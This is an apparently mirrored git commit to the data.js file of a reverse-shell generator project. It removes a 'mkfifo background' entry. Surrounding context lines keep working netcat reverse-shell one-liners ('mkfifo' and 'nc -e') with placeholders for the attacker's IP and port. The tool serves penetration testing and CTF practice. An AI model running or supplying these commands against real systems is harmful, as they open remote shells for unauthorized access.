mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2025-02-22 14:43:42 +00:00
Update data.js
Removed mkfifo background for now
This commit is contained in:
parent
2b4821d0e6
commit
6dda01a461
@ -50,11 +50,6 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name:" "mkfifo background",
|
||||
"command": "(mkfifo \/tmp\/MmE1M; nc {ip} {port} 0<\/tmp\/MmE1M | {shell} >\/tmp\/MmE1M 2>&1; rm \/tmp\/MmE1M) &",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name": "nc -e",
|
||||
"command": "nc -e {shell} {ip} {port}",
|
||||
|
Loading…
Reference in New Issue
Block a user